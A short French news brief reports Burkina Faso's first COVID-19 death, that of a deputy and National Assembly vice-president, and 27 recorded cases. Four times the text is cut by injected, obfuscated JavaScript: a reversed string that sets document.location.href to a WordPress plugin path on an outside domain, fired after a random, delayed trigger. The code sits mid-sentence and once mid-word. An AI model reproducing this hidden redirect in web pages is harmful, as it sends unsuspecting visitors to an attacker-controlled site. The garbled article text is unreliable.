AFRIQUE

BURKINA-FASO: La vice-présidente de l’Assemblée nationale, première victime du coronavirus

Le Burkina Faso a enregistré un premier décès lié au coronavirus ce mercredi. Il s’agit d’une députée, membre-fondatrice de l’UPC et 2e vice-présidente de l’Assemblée nationale.  A en croire des médias locaux toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont Wakatsera, la victime, la députée Marie Rose Compaoré était une diabétique âgée de 62 ans qui était sous réanimation. L’élue est deuxième vice-présidente de l’Assemblée nationale du pays.

8 nouveaux cas de coronavirus en 24 h

Le nombre de malade passe à 27, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont 15 femmes et 12 hommes après la détection de sept nouveaux cas. Un premier cas en dehors de la capitale Ouagatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dougou a été confirmé à Bobo Dioulasso, la deuxième ville du Burkina Faso. Le pays de Roch Marc Kaboré est endeuillé après que le virus ait frappé au cœur de l’institution de contre pouvoir. C’est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc le premier décès en Afrique subsaharienne.

Source: MediaCongo

%d blogueurs aiment cette page :